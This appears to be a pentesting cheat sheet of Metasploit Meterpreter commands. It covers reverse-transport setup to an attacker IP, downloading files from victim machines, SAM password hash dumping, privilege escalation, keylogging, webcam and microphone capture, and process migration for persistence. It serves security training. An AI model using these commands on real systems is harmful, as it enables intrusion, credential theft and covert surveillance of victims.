Meterpreter

Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.

See OffSec’s Meterpreter basic commands.

Meterpreter Sessions

Display opened sessions

sessions -l -v

Go to session #1

sessions -i 1

Upgrade session #1

sessions -u 1

Obtain system information and user

sysinfo
getuid

Obtain system information and escalate privileges

sysinfo
getsystem

Go back to the handler

background

List transports

Transports allow to switch protocols after a session is created. See Meterpreter Transport Control.

transport list

Add a transport

After adding the transport, background the session and start a listener using the Multi Handler.

transport add -t <transport name> -l $KALI_IP -p $LISTENER_PORT

Like windows/meterpreter/reverse_tcp payload

transport add -t reverse_tcp -l $KALI_IP -p $LISTENER_PORT

Switch to next transport

transport next
sessions
sessions -i 2

Download a file from the victim machine

download <source> <destination>
download c://secret.txt /root/Documents/
download "c:\windows\system32\calc.exe" /tmp/calc.exe

Upload a file to the victim machine

upload <source> <destination>
upload localfilepath/file.txt /remotefilepath/file.txt
upload /usr/share/windows-resources/binaries/plink.exe c:\\somepath

Other commands

# Get all available commands
help

# Dump the contents of the SAM database (all computer passwords)
hashdump

# Get a shell
shell
python -c 'import pty; pty.spawn("/bin/bash")'

# Upload a file to the victim computer


# Start a keylogger
keyscan_start

# See keylogger results
keyscan_dump

Privilege Escalation

Elevate privileges to system

getsystem

Gather information for privilege escalation

use post/windows/gather/win_privs
set session <session ID>
run

Post-Exploitation within Meterpreter

help

Some actions are sensitive to context.

Dump contents of the SAM database

hashdump

Take a screenshot of the victim machine

Error: Current session was spawned by a service on Windows 8+. No desktops are available to screenshot.

screenshot

See the victim machine’s screen in real time

screenshare

Webcam

Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

Keylogger

keyscan_start
keyscan_dump
keyscan_stop

Migrating to another process

Meterpreter payloads are executed within the application process attacked. When this application is closed, the session dies. Migrate to another process after the Meterpreter session is created to avoid losing the session.

List current processes

ps

Migrate the Meterpreter session to another process

The process must have the same privilege and integrity level or lower.

migrate <PID>

Port Forwarding

portfwd -h